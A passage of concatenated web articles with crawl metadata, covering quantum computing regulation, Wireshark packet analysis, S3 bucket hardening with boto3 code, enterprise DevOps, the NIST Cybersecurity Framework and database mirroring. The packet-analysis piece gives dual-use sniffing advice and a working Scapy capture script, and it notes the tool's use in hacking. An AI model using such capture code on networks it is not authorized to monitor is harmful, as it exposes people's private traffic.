naive about it and believing that everything will just take care of itself is also, in the 21st century, unacceptable.”
<urn:uuid:700f66cd-aca9-4df2-8ba5-3051ab6c750d>
CC-MAIN-2022-40
https://techmonitor.ai/technology/ai-and-automation/public-opinion-ai
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00452.warc.gz
en
0.962972
1,260
2.71875
3
Quantum computing could be “more dangerous than artificial intelligence” if sufficient regulation is not put in place around the technology, a prominent academic has warned. However, with quantum machines already emerging from laboratories into the real world, it may be too late to effectively regulate their application. In an article in Foreign Policy Magazine, Stanford University law professor Mauritz Kop said it is vital to learn from the mistakes made around the regulation of AI “before it is too late” to control the impact of quantum machines. Kop is researching transformative technologies such as AI and quantum to understand the impact they will have on society and how they should be regulated. Governments are only now starting to tackle the issue of artificial intelligence regulation, with the technology’s use already widespread. The UK government this year revealed a framework that includes limiting biometric usage and requiring the publication of risk and mistake levels in data output. This follows multiple instances of bias found within AI applications used in public and private sector organisations.
Significant benefits from quantum computing technology
Quantum computers operate on a completely different basis from classical machines, with qubits able to occupy multiple states rather than just the ones and zeros of standard bits. This could allow for error-resistant and rapid solutions to incredibly complex mathematical problems. The multiple states mean a quantum computer’s capacity can increase exponentially with every new qubit added to the machine. Most quantum machines have between five and 20 qubits today, with companies expecting 1,000 qubits within five years and a million within a decade. Indeed, it could take up to 15 years before quantum advantage, the point at which quantum computers can consistently outperform their classical counterparts, is achieved. It is hoped that as well as cracking existing cryptography, quantum technology will be used to create new materials without the need for prototyping, predict future climate change with greater accuracy and model new chemical combinations for drug treatments. Though a lot of funding is being pumped into the sector, today’s quantum computing start-ups are making long-shot bets that their chosen approach might define the next computing paradigm, argues Todd R. Weiss, an analyst who covers quantum computing for Futurum Research. “A lot of these ideas aren’t going to work,” he says. As such, the next decade will be a process of weeding out the bad ideas. “Quantum will start as a big funnel in terms of ideas and will converge and squish together into five or ten serious companies in five to ten years,” Weiss predicts. In his article, Professor Kop said that it is vital we have an understanding of the full potential impact of quantum now so it can be regulated and prevented from getting into the wrong hands, before it’s too late to make any changes or stop irreparable damage from happening. He predicts that some will use the technology for illegal purposes, including compromising bank records, hacking into private communications and being able to access the passwords of every computer in the world. Companies and government agencies are working to protect against this with the emergence of quantum cryptography, but this is also in its infancy.
Quantum danger: every classical computer 'at risk'
David Williams, founder of quantum cryptography company Arqit, says that the solution isn't regulation but technology.
He told Tech Monitor quantum technology is “already out of the bag” and beyond the reach of regulators internationally. Williams says that governments taking “a restrictive national approach to innovation and export control will merely harm domestic interests whilst more assertive countries like China storm ahead”. The biggest risk to the world from quantum computers could be their ability to quickly and easily crack existing cryptography, he believes. “Regulators therefore need a very open mind about what technologies they seek to deploy in protecting the data of Governments, enterprises and citizens," Williams says. “Relying on a small cohort of academics and public servants to decide what good looks like is also not an approach that has produced great innovation in recent decades – the best and brightest minds of global industry need to come together to solve this problem at scale.” Liz Parnell, COO of Rackspace Technology, told Tech Monitor the bigger risk is the fact that the technology is likely to be concentrated in a few small hands rather than be widespread and readily available like classical computers are today. “How comfortable are we with that?” she asks. She gives the example of a company like Amazon, which is investing heavily in quantum computing projects as well as controlling a large share of the retail sector and increasingly buying up health providers in the US. “Amazon knows everything about us and putting that data into quantum computers could allow them to make incredibly accurate predictions," Parnell says. “This technology could run away from us so quickly and I don’t know many people who are having conversations about the ethics of this, intrinsic bias and how to protect people from misuse.”
As quantum computing research ramps up, will regulation follow?
Countries around the world are pouring money into quantum computing projects or launching centres for quantum research to ensure they're not left behind in the race for quantum supremacy. Currently China and Europe are outpacing the rest of the world in terms of public funding for quantum computing efforts, with China planning $15.3bn and the EU $7.2bn. In comparison, the US has a $1.9bn planned budget and the UK $1.3bn, according to a report by McKinsey. Kop writes that to avoid the ethical issues that have dogged AI and machine learning around misuse, transparency and bias, nations need to introduce controls that correspond to the power of quantum and respect democratic values, human rights and freedoms. The article states that "governments must urgently begin to think about regulations, standards and responsible uses". Mira Pijselman, senior consultant at Ernst & Young, wrote in an article for the company that business and technology leaders can't risk waiting for quantum technology to mature before enabling quantum ethics, agreeing with Kop that it has to be done now, before the technology is widespread. She wrote that “a successful transition to quantum will require existing cyber, data and AI governance capabilities to be expanded upon — but not replaced. Quantum technologies will magnify current organisational risks, with a particular focus on where quantum computing intersects with AI”.
<urn:uuid:3cc2d886-6fbb-4b0e-9e50-ee1d0f43ca78>
CC-MAIN-2022-40
https://techmonitor.ai/technology/emerging-technology/quantum-computing-regulation-ai
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00452.warc.gz
en
0.948411
1,293
3.03125
3
By Milica D. Djekic
Internet packets are the sets of information created and transmitted to carry a message through the network’s communications. These packets may consist of many bytes, and they also carry details regarding the source and destination as well as much more useful information describing the packet. One of the most convenient tools used for packet analysis today is Wireshark, which offers many good functions and capabilities. This tool could be used for hacking as well as defense purposes. It takes only a few days of training to learn how to take advantage of that application. Through this article, we intend to discuss how such software could be used, as well as provide a bit closer look at smart packet analysis. Dealing with the hardware is of crucial importance because that part of the operation defines which segments of the packets can get captured and transmitted to an analyzer. Sometimes beginners may handle the equipment so unskillfully that, instead of capturing someone else’s network traffic, they simply capture their own network’s communications. The parts of the network receiving and sending the packets are called routers, and they commonly rely on switches to make such a transmission more efficient. As we said – the most frequently used software for packet analysis is Wireshark. That tool is simple to apply, and it may offer many advantages once you make the decision to configure your network for monitoring internet traffic with sniffers, being equipped with the software and physical gadgets. The Figure on the left demonstrates how the Wireshark capture options appear. We would strongly encourage everyone interested in learning more about this tool to take advantage of the many web resources offering an opportunity to learn and explore everything you want to know about this software. One more thing being used in network communication is a protocol. The protocol is a set of rules that computers use to communicate with each other. The most typical protocols are TCP, UDP and IP. Dealing with the protocols is much like dealing with standard human communication. There would be some common rules – similarly as in person-to-person communication. For instance, a good analogy could be – Person 1: “Hi! How are you?”; Person 2: “Good, thank you. Yourself?” and Person 1: “I am fine, thank you!” Practically, that’s how the protocols communicate with each other. It’s quite simple, convenient and clear! Many Wireshark experts would suggest you have a look at how the packets of information got transmitted. For instance, if you notice that some of the packets within that environment indicate a re-transmission, it would undoubtedly suggest that there must be some error with the sending and receiving options. On its way from a source to a destination – a packet may struggle to get delivered. Sometimes the routers, as the devices in a communication network, could cause concern. Please have a look at the Figure on our right and try to notice that the entire network would deal with the routers, users, links, and packets being sent and received. If you choose the physically appropriate locations to put your sniffers there, you would so easily get in a position to read that internet traffic.
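To complement the Wireshark discussion, the snippet below shows a minimal programmatic capture using the Scapy library rather than Wireshark itself. It is an illustrative sketch only: it assumes Scapy is installed, live capture usually requires administrator/root privileges, and you should only monitor networks you are authorized to inspect.

```python
from collections import Counter

from scapy.all import IP, TCP, UDP, sniff

protocol_counts = Counter()


def summarize(packet) -> None:
    """Print a one-line, Wireshark-style summary of each captured packet."""
    if IP in packet:
        proto = "TCP" if TCP in packet else "UDP" if UDP in packet else "other"
        protocol_counts[proto] += 1
        print(f"{packet[IP].src} -> {packet[IP].dst} [{proto}] {len(packet)} bytes")


# Capture 20 packets from the default interface (root privileges usually required).
sniff(prn=summarize, count=20, store=False)

# A spike of retransmissions or unexpected destinations is the kind of anomaly
# the article suggests looking for in captured traffic.
print(protocol_counts)
```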
As we said, this method can be helpful for monitoring purposes, while Wireshark is also commonly used in hackers' operations as one of the network penetration testing tools. Either way, all of these uses ultimately serve a defensive purpose and require the equipment to be applied smartly and effectively. Working with packet-analysis tools can be quite interesting, so we strongly recommend that everyone play with these tools and test their capabilities. About The Author Since Milica Djekic graduated from the Department of Control Engineering at the University of Belgrade, Serbia, she has been an engineer with a passion for cryptography, cybersecurity, and wireless systems. Milica is a researcher from Subotica, Serbia. She also serves as a reviewer at the Journal of Computer Sciences and Applications. She writes for American and Asia-Pacific security magazines. She is a volunteer with the American Corner of Subotica as well as a lecturer with the local engineering society.
<urn:uuid:2f913970-ea6a-4e1e-8a2d-82115f903d29>
CC-MAIN-2022-40
https://www.cyberdefensemagazine.com/the-packet-analysis/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00452.warc.gz
en
0.964438
945
3.1875
3
Understanding S3 Bucket Security – A Contextual Approach Friday, September 16, 2022 In 2017, 4 million records with customer information, login credentials, and source code were made publicly available due to 2 unsecured AWS S3 storage buckets owned by Time Warner Cable. The consequences of this attack were disastrous, and this event showed the entire cloud industry how important security is. In this article, we will learn more about Amazon S3 buckets, misconfigurations and vulnerabilities, and how to secure them. What is an Amazon S3 bucket? An Amazon S3 bucket is a storage cloud asset that acts as a container for data stored in the public cloud. Buckets are object storage services and are similar to folders; this type of storage is flexible and scalable and is ideal for large files and unstructured data. Common S3 Bucket Misconfigurations 1. Public access to a bucket is allowed. Sometimes, Amazon S3 buckets are required to be publicly accessible. For example, this use case occurs when the owner intends to make data accessible to the internet. However, breaches occur when a bucket that holds sensitive information such as PII (Personally Identifiable Information) allows: - Public "READ" access, - Public "WRITE" access. You can grant and deny access to a bucket using access control lists and bucket policies. An access control list (ACL) is a set of rules that limits access to buckets through permissions. It defines an account's access level over a bucket (for example, READ or WRITE). A bucket policy also contains rules based on which access is allowed or denied, but it is a more modern solution because it can enable more complex filtering. It is a JSON-based access policy language. Amazon recommends that you no longer use ACLs except in special cases in which you need to filter access to objects individually. 2. No at-rest encryption is performed. Data at rest should always be encrypted to ensure confidentiality and improve your cloud data security. Performing encryption on the objects inside a bucket ensures that, even if a malicious entity gains access to your data, they cannot read it. AWS provides multiple encryption options to protect data at rest. For example, you can enable default encryption and set it so it automatically encrypts any new objects added to the bucket. Encryption should be done using industry-recommended algorithms and strong cryptographic keys. A strong encryption algorithm is AES-256 (Advanced Encryption Standard with a key of 256 bits). 3. In-transit encryption is not enabled. Besides the data that is already stored, you should also encrypt the data that travels to and from the S3 bucket. This step prevents eavesdropping attacks. It is not enough to store your data encrypted; your efforts are wasted if it travels in plain text and attackers can read it. Data in motion can be encrypted using SSL/TLS. TLS (Transport Layer Security) and SSL (Secure Sockets Layer) are transport layer protocols that protect data in transit. TLS is a newer and improved version of SSL. Another solution for in-motion encryption is preparing the data to be transported by encrypting it on the client side. 4. Logging is disabled. Logging an S3 bucket is an essential step in securing your data. With logging, you can record actions taken by users, keep log files for compliance purposes and understand which roles have permission to access data inside a bucket. There are two solutions for AWS bucket logging: - Server access logging, and - AWS CloudTrail.
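As a hedged sketch of how misconfigurations 2 and 3 above might be addressed with boto3 (the article itself does not prescribe code), the example below turns on default at-rest encryption and attaches a policy that denies non-TLS requests; the bucket name is a placeholder.

```python
# Sketch with assumed placeholder bucket name "my-example-bucket".
import json
import boto3

s3 = boto3.client("s3")
bucket = "my-example-bucket"

# 2. Default server-side encryption (AES-256) for new objects.
s3.put_bucket_encryption(
    Bucket=bucket,
    ServerSideEncryptionConfiguration={
        "Rules": [{"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "AES256"}}]
    },
)

# 3. Deny any request that does not use TLS (aws:SecureTransport = false).
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:*",
        "Resource": [f"arn:aws:s3:::{bucket}", f"arn:aws:s3:::{bucket}/*"],
        "Condition": {"Bool": {"aws:SecureTransport": "false"}},
    }],
}
s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(policy))
```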
With server access logging, you obtain detailed records regarding requests that are made to a bucket. AWS CloudTrail is a comprehensive service that tracks user activity and API calls, and it can be used to keep a record of who sends requests to a bucket. It is important to keep in mind that AWS CloudTrail does not log failed authentication attempts made with incorrect credentials; however, it does track requests made by anonymous or unauthorized users. 5. No regular backups are performed. Attackers may not only try to steal your sensitive data, but they can also delete it. Therefore, ensuring regular and consistent backups is essential to configuring your buckets and providing availability. Using AWS Backup, you can perform S3 bucket backups. Amazon supports the following types of backups: - Continuous backups, which allow data restoration from any moment in the last 35 days, - Periodic backups, which can be performed every 1 hour, 12 hours, or less often. An important feature of AWS Backup is that tags, access control lists, and other metadata are saved along with your data. An additional layer of security can be added by using the MFA delete feature in AWS. This option requires a successful MFA challenge before allowing a user to delete an object or bucket. Moreover, you can keep multiple versions of an object inside a bucket. This process is called versioning and can be used to recover objects from accidental deletion. Do you have a complete cloud security program? In this article, we've discussed many possible misconfigurations, along with best practices. However, in order to fully understand your public cloud infrastructure and find vulnerabilities, you need to have good visibility over your cloud environment. Using a new feature in Cyscale, the bucket graph, you can put all of your knowledge in context and gain a better understanding of your infrastructure. Below, you can see an example of a bucket graph. Although the bucket (shown on the right) has only two IAM policies attached, we can see that these have a significant impact on the infrastructure: the AmazonS3FullAccess policy gives full access rights to a specific user and to a VM that can assume an associated IAM role. In addition, there's a Lambda function that has a role which gives it permission to perform actions on the bucket. Without context, we would not be able to understand a policy's impact and the associated risk. Moreover, the icon on the right shows us that the bucket violates three policies. Cyscale users can click on the icon and obtain more details regarding this alert. This feature helps you quickly understand and fix any misconfigurations and vulnerabilities introduced in the cloud environment due to the bucket's settings. Besides the graph, you can also use controls to check your cloud configurations easily. Find any gaps in your buckets' configurations using Cyscale controls! Here are a few examples that can help you instantly check the most common misconfigurations regarding S3 buckets: - Ensure S3 bucket ACL grants permissions only to specific AWS accounts - Ensure all S3 buckets employ encryption-at-rest - Ensure a log metric filter and alarm exist for S3 bucket policy changes - Ensure that there are no publicly accessible objects in storage buckets Build and maintain a strong Security Program from the start.
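In the same spirit, here is a sketch of the logging, versioning, and public-access controls discussed above, again using boto3 with placeholder bucket names; MFA delete is omitted because it additionally requires the bucket owner's root credentials and an MFA device.

```python
# Sketch with assumed placeholder bucket names.
import boto3

s3 = boto3.client("s3")
bucket, log_bucket = "my-example-bucket", "my-example-log-bucket"

# 4. Server access logging into a separate log bucket.
s3.put_bucket_logging(
    Bucket=bucket,
    BucketLoggingStatus={"LoggingEnabled": {
        "TargetBucket": log_bucket, "TargetPrefix": f"{bucket}/"}},
)

# 5. Versioning, so deleted or overwritten objects can be recovered.
s3.put_bucket_versioning(
    Bucket=bucket, VersioningConfiguration={"Status": "Enabled"})

# 1. Block public ACLs and policies at the bucket level.
s3.put_public_access_block(
    Bucket=bucket,
    PublicAccessBlockConfiguration={
        "BlockPublicAcls": True, "IgnorePublicAcls": True,
        "BlockPublicPolicy": True, "RestrictPublicBuckets": True},
)
```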
<urn:uuid:4a0b9af8-32a6-4174-989d-eb3c6013cdde>
CC-MAIN-2022-40
https://cyscale.com/blog/s3-bucket-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00452.warc.gz
en
0.921434
1,452
2.921875
3
DevOps is a set of practices that works to build collaboration among teams in order to develop, test, and roll out software more quickly and effectively. The concept of DevOps was originally developed in the context of agile web startups, and many question whether these practices can be applied to larger businesses and enterprises. The reality, however, is that while specific solutions might vary based on organizational size and demands, the basic principles of DevOps can be applied to and add value to organizations of all sizes. What is DevOps? To fully appreciate what DevOps is, it's helpful to first focus on the division that has long existed in IT organizations between development teams and operations teams: - In a traditional model, development teams are responsible for creating and changing software. They are primarily focused on innovation, new products, and new features. - In contrast, operations teams are focused on system stability and accessibility. Their focus is more service-oriented, and they work to guarantee that systems are stable and consistently working effectively. At their core, the teams seem to represent two competing interests, as one team works to consistently deliver software changes while the other works to maintain availability and function. In a traditional model, the two departments are separate, with organizations consistently having to choose between them. DevOps, on the other hand, gets away from this divided, silo mentality. DevOps instead focuses on collaboration and shared values across teams. The basic goal of DevOps is maximizing the development-to-operations value stream and ensuring an efficient flow of changes from development to operations. The specific solutions organizations use to meet this goal vary from one organization to the next. In addition, the DevOps model generally involves shared values across teams, including more frequent releases of new software and software changes, an increased emphasis on automation, and a sense of shared responsibility. While DevOps looks different from organization to organization, at its core it's culture, tools, and practices that work to bring teams, individuals, processes, and products together in order to develop and roll out software faster and more effectively. Does DevOps work for enterprises? DevOps is often associated with small and agile organizations, and many of the traditional tools associated with DevOps are geared towards these types of organizations. The truth is that many of those tools and practices are not applicable to large enterprises with big teams, operational complexity, and lots of internal and external regulation. Making the shift to DevOps even more difficult is the reality that enterprises generally have to deal with change control processes, release teams and approval gates, large environments, and a lot of teams and groups. All of these factors can make it challenging for enterprises to move to a DevOps model. Despite these very real concerns, DevOps practices can work effectively for businesses of all sizes. While the specific solutions will look different based on the size of the organization, the basic principle of collaboration between development and operations teams to lead to better outcomes can be effectively scaled. Not only is DevOps possible for enterprises, but in the current environment, it's a necessary shift for many organizations to support ongoing digital transformation, organizational growth, and increased capabilities. How do you make DevOps effective at enterprise scale?
While making the shift to DevOps is important for staying competitive and meeting customer demands, implementing these practices on an enterprise scale is hard and requires some major shifts in the way teams plan, build, test, release, and manage software. For many organizations, the shift can feel overwhelming, but here are some things to help make this transition smooth and successful. Don’t Ignore or Replace What Works Most enterprises have already spent a substantial amount of time, money, and energy developing software and systems that work. When making the shift to DevOps and promoting an increased focus on continuous development and change, it can be tempting to always focus on what’s new and what’s next. However, doing so can be incredibly inefficient and ignores what’s already working well while meeting the organization’s needs. Instead of overlooking or replacing what’s working, build upon what’s working. Organizations that are able to do this effectively are able to reduce risks, costs, and the all-important time-to-value metric. Prioritize Building Confidence Across the Organization A shift to DevOps can leave many across the organization concerned about unnecessary risks and potential negative impacts on customers. Ultimately, however, this shift is aimed at enabling enterprises to continue to be competitive and innovative without being held back by concerns about undue risks. To effectively and comfortably make this shift, teams need to prioritize consistency, quality, and security from the very beginning. Addressing and preventing problems before they arise can help to make this organizational shift as seamless as possible. Further, ensuring that quality and consistency are always at the center of this change can help to build confidence throughout the organization, ensuring a successful transition. Identify and Deliver the Right Outputs It’s always important for IT organizations to focus on the right outputs. Many times outputs are centered around finishing a project or a product when instead they should be focused on targeted and measurable business outcomes. When it comes to DevOps, generally the outputs should be focused on the benefits that customers receive. From the start of any project, it’s important for teams to understand customer needs thoroughly and to identify the specific need that is being addressed with a project or product. To ensure that teams stay on track to meet these goals, it’s necessary to consistently revisit these objectives and evaluate the progress towards them, which often includes course corrections. Implementing a continuous feedback system is an ideal way to ensure that all teams are on track to deliver the right outputs. However, regardless of the system that your team uses, it’s essential to focus consistently on identifying and delivering the right outputs. Limit Operational Friction DevOps aim to have a quick flow of changes across development and operations teams to stay competitive and meet customer demands. Doing this effectively means working efficiently across teams and throughout the organization. Eliminating any operational friction that will interfere with this objective makes it easier for teams to meet demands, increase automation, and develop organization-wide systems. As a result, proactively reducing operational friction among everything from teams to departments to vendors will help enable an effective transition to a DevOps model. As discussed, the shift to DevOps is not easy, especially for large organizations. 
One way to ensure that the transition is successful is to share progress regularly. This sharing of information doesn’t have to be formal and can be as simple as regular status updates. However, it’s important for there to be visible progress and results seen throughout the organization. To meet this need, consistent progress sharing is essential. Many large organizations have successfully made the transition to DevOps practices, serving as proof points that this concept is applicable and effective for enterprises. While the shift might not be an easy one, it’s an important change to make, ensuring that organizations stay competitive while timely meeting customer needs. Being strategic about making this shift and proactively planning for its success can make this transition smoother and easier. For more on DevOps, explore these resources: - BMC DevOps Blog - DevOps Guide, with 25+ articles on tips, best practices, and more - The State of DevOps in 2020 - What Is Cloud Native DevOps? - An Integrated DevOps Strategy for the Autonomous Digital Enterprise
<urn:uuid:733060c2-52a1-44ac-866c-ba8444d52466>
CC-MAIN-2022-40
https://www.bmc.com/blogs/devops-enterprises/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00452.warc.gz
en
0.947216
1,543
2.921875
3
What Are NIST Security Standards? Businesses today find themselves asking, “What are NIST security standards and how can they be applicable to them?” This should not come as any great surprise—we are currently experiencing a dramatic shift in attitudes towards the threat of cybercrime and there’s a growing recognition among organizations that security standards in network security are not just an important aspect of a modern company, but actually vital to its survival. Prior to the pandemic, companies by their own admission were unprepared for cyberattacks, with just 23% of organizations indicating they had an incident response plan applied across their business, according to IBM. Many companies are simply not ready for the number and severity of modern cyberattacks, and this is no small matter—93% of companies without a disaster recovery plan who suffer a major data disaster go out of business within one year. Because of the pandemic and the changes it brought, cyberattacks are currently at higher levels than ever, and businesses must respond in order to protect themselves and their customers. This is where frameworks like NIST come in—companies are looking for guidance on their cybersecurity and hope that standards like NIST can provide it. In this blog, we’re going to take a look at what NIST security standards are, break it down, and determine how applicable it is to organizations across the country that want to shore up their business security. What Is NIST? The National Bureau of Standards, as it was known until 1988, was founded in 1901 as a non-regulatory agency to provide standards across a range of industries, including manufacturing, environmental science, public safety, nanotechnology, information technology, and more. Over the years since its founding, the remit of NIST has extended over a growing number of industries, of which cybersecurity (under IT) is just one. NIST frameworks, including its cybersecurity framework, are intended to be voluntary guidelines for all organizations except those engaging with government contracts, which are required to abide by them. What Is the NIST Cybersecurity Framework (CSF)? The NIST Cybersecurity Framework, or CSF for short, was established by executive order in 2013 under President Obama in order to create a framework consensus for approaching cybersecurity with the intention of reducing risk to critical government and public infrastructure systems. The first version of the CSF was published in 2014, and Congress passed the Cybersecurity Enhancement Act of 2014 shortly thereafter with the following stated purpose: AN ACT To provide for an ongoing, voluntary public-private partnership to improve cybersecurity, and to strengthen cybersecurity research and development, workforce development and education, and public awareness and preparedness, and for other purposes. Another executive order was issued by President Trump in 2017, directing all federal agencies to use the framework. In 2015, an estimated 30% of US businesses used the CSF, with a further rise to 50% in 2020. The success of the framework has led to it being adopted not just in the United States, but across the world, from the United Kingdom to Israel. NIST Framework Summary So, what are NIST security standards? The NIST Cybersecurity Framework is broken down into three distinct components: the “Core”, “Implementation Tiers”, and “Profiles”. The Framework Core is the set of activities that are designed to achieve the best cybersecurity outcomes desired by NIST standards. 
These activities are not a checklist, but rather key outcomes identified by stakeholders as significant in managing cybersecurity risk. What Are the Elements of NIST Security Standards? There are four key elements that make up the Framework Core. These are: - Functions: Functions are some of the most recognizable aspects of the NIST cybersecurity framework. They outline the basic security activities from a high-level perspective and help organizations address the most crucial elements of cybersecurity. The Functions are Identify, Protect, Detect, Respond, and Recover. - Categories: The Categories are focused on business outcomes and are slightly more in-depth, covering objectives within the core Functions. - Subcategories: Subcategories are the most granular level of abstraction in the Core. There are a total of 108 Subcategories, which are typically outcome-driven and designed to provide considerations for establishing or improving a cybersecurity program. - Informative References: Informative References refer to existing standards, guidelines, and practices relevant to each Subcategory. NIST Categories of the Five Key Functions of the Cybersecurity Framework As we noted, each of the key Functions is broken down into NIST Categories and NIST Subcategories. The NIST Categories, grouped by Function, are as follows: Identify - Asset Management, Business Environment, Risk Assessment, Risk Management Strategy, Supply Chain Risk Management. Protect - Identity Management and Access Control, Awareness and Training, Data Security, Information Protection Processes & Procedures, Protective Technology. Detect - Anomalies and Events, Security Continuous Monitoring, Detection Processes. Respond - Response Planning. Recover - Recovery Planning. The Framework Implementation Tiers help illustrate the extent to which an organization is able to effectively meet the characteristics outlined in the Framework Functions and Categories. These Implementation Tiers are not considered levels of cybersecurity maturity and are not intended to be. However, organizations that meet the standards for the highest tiers will inevitably have many of the characteristics that define cyber-mature companies. Tier 1 (Partial) Risk Management Process: Risk management practices are not formalized and risk is managed in an ad hoc fashion. Integrated Risk Management Program: Limited awareness of cybersecurity risk at the organizational level. External Participation: The organization doesn't collaborate with other entities or understand its role in the larger ecosystem. Tier 2 (Risk Informed) Risk Management Process: Risk management practices are approved by management and prioritized according to organizational risk objectives. Integrated Risk Management Program: Awareness of cybersecurity risk at the organizational level, but lacking a company-wide approach to managing this risk. External Participation: The organization recognizes its role in the business ecosystem with respect to its dependencies or dependents, but not both. Some collaboration, but it may not act consistently or formally on risks presented. Tier 3 (Repeatable) Risk Management Process: Risk management practices are formally approved and expressed through policy. Cybersecurity practices are regularly updated based on the application of the formal risk management process. Integrated Risk Management Program: An organization-wide approach to security risk management is in place, and personnel possess the knowledge and skills to manage security risks.
External Participation: The organization’s role in the larger ecosystem is understood as it pertains to other companies and it may contribute to the community’s broader understanding of risks. Collaborates with and receives information from others regularly. Tier 4 (Adaptive) Risk Management Process: Cybersecurity practices are adapted and developed based on previous and current activities, as well as predictive indicators. Continuous improvement of processes through the incorporation of advanced technologies and practices is expected. Integrated Risk Management Program: The relationship between security risk and organizational objectives is understood clearly. Security risk management is part of the organizational culture and changes to how risk management is approached is communicated quickly and effectively. External Participation: Organization fully understands its role in the larger ecosystem and contributes to the community’s understanding of risks. Receives, generates, and prioritizes information that informs constant analysis of risks. Real-time data analysis is leveraged, and communication is proactive as it pertains to risks associated with the products and services used. The Framework Profile refers to the overall alignment of Functions, Categories, and Subcategories with the organization’s business requirements, risk tolerance, and resources. Because different businesses have different priorities, no two profiles will be the same, and so determining the unique Framework Profile that best fits the company is the final key aspect of the NIST standards. Current Profile vs. Target Profile When businesses establish profiles for cybersecurity standards, a common and effective way of understanding where they are and where they want to be is to create two profiles: the current profile and the target profile. The current profile is created by assessing the organization’s ability to carry out subcategory activities. Examples of subcategories include things like, “Physical devices and systems within the organization are inventoried” (ID.AM-1), and, “Data-in-transit is protected” (PR.DS-2)”. These are just two examples of the 108 total Subcategories, but give an indication of the kinds of activities that are assessed. Once the current profile has been established by ranking the company’s ability to fulfill each subcategory, it is then time to create the target profile. The target profile is effectively where the company should be with its cybersecurity in order to meet the desired risk management goals and priorities. Once the target profile has been created, the organization can then compare the two and get a clear understanding of where the business meets their risk management goals and where improvements need to be made. This is one of the most effective ways to understand fully what NIST security standards are and how directly applicable they are to an organization in terms of improving their protocols and getting compliant with NIST’s CSF recommendations. Who Uses the NIST Cybersecurity Framework? As we’ve noted, NIST is designed first and foremost as a framework aimed at those companies in the federal supply chain, whether it’s prime contractors, subcontractors, or another entity required to be compliant with NIST. 
NIST's standards, however, are applicable to virtually any business and are an extremely valuable resource for determining a company's current cybersecurity activities and its ability to carry them out to an acceptable standard, in addition to uncovering new and unknown priorities. The ultimate goal of NIST is to provide a framework not just for federally associated organizations, but for the business world at large. To this end, NIST plans to continually update the cybersecurity framework to keep it fresh and applicable to anyone, whether they specifically need NIST CSF compliance or not. We hope this blog post has helped you get an understanding of what NIST security standards are and how they are used in organizations. While NIST CSF compliance is not necessary for organizations not contracted by the government or subcontracted by a government contractor, many of its activities and protocols apply to many other compliance regulations that must be followed, like HIPAA and PCI, or rules governing PII. For compliance with these regulations (and many others), it is suggested to use a governance, risk and compliance (GRC) solution so that activities can be accurately monitored and maintained. At Impact, we offer such a solution, with options for hybrid or full management of GRC from our experts, who will perform a risk assessment and make sure that your cybersecurity policies are exactly where they need to be to remain compliant. For more information, take a look at our Compliance Services page and connect with a specialist to see how Impact can get your organization's compliance on track today.
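The current-versus-target profile comparison described earlier boils down to scoring each Subcategory twice and looking at the difference. The sketch below is a minimal illustration of that idea only; the 0-4 scale and the example scores for ID.AM-1 and PR.DS-2 are assumptions, not NIST guidance.

```python
# Minimal sketch: compare a current profile against a target profile per
# Subcategory. The scoring scale and the example scores are assumptions.
current = {"ID.AM-1": 2, "PR.DS-2": 1}   # assessed capability today
target  = {"ID.AM-1": 4, "PR.DS-2": 3}   # desired capability

for subcategory in sorted(target):
    gap = target[subcategory] - current.get(subcategory, 0)
    status = "meets target" if gap <= 0 else f"gap of {gap}"
    print(f"{subcategory}: current={current.get(subcategory, 0)}, "
          f"target={target[subcategory]} -> {status}")
```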
<urn:uuid:175a3d6b-2b31-4a19-bd34-0db7c8835832>
CC-MAIN-2022-40
https://www.impactmybiz.com/blog/what-are-nist-security-standards/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00652.warc.gz
en
0.940498
2,358
3
3
Database mirroring is a relational database management system (RDBMS) technique for maintaining consistent, highly available data by creating redundant copies of a dataset. What do I need to know about database mirroring? A database mirror is a complete backup of the database that can be used if the primary database fails. Transactions and changes to the primary database are transferred directly to the mirror and processed immediately, so the mirror is always up to date and available as a "hot" standby. Who uses database mirroring? Database mirroring is a form of data replication. While all transactional systems require some form of data replication in order to prevent loss and maintain high availability, not all databases use mirroring. Among commercial RDBMS products, Microsoft SQL Server is notable for its use of database mirroring. What are the benefits of database mirroring? Thanks to automatic failover, database mirroring facilitates high availability of data systems and the applications that use them. It also provides transactional consistency so that the data is always up-to-date and consistent.
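As a purely conceptual illustration of the "hot standby" idea, and not of how SQL Server mirroring is actually configured, the sketch below applies each change to a mirror copy alongside the primary so that failover simply promotes the mirror.

```python
# Conceptual sketch only: every committed change also lands on the mirror,
# so promoting the mirror after a failure loses nothing.
class MirroredDatabase:
    def __init__(self):
        self.primary = {}
        self.mirror = {}

    def commit(self, key, value):
        self.mirror[key] = value      # ship the change to the mirror
        self.primary[key] = value     # and apply it on the primary
        return "committed on primary and mirror"

    def failover(self):
        # If the primary fails, the mirror already holds identical data.
        self.primary = self.mirror
        return "mirror promoted to primary"

db = MirroredDatabase()
db.commit("account:42", {"balance": 100})
print(db.failover(), db.primary)
```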
<urn:uuid:4591b8c4-fa2e-491d-af11-b8d6fe81a2fd>
CC-MAIN-2022-40
https://www.informatica.com/au/services-and-training/glossary-of-terms/database-mirroring-definition.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00652.warc.gz
en
0.887636
220
3.203125
3
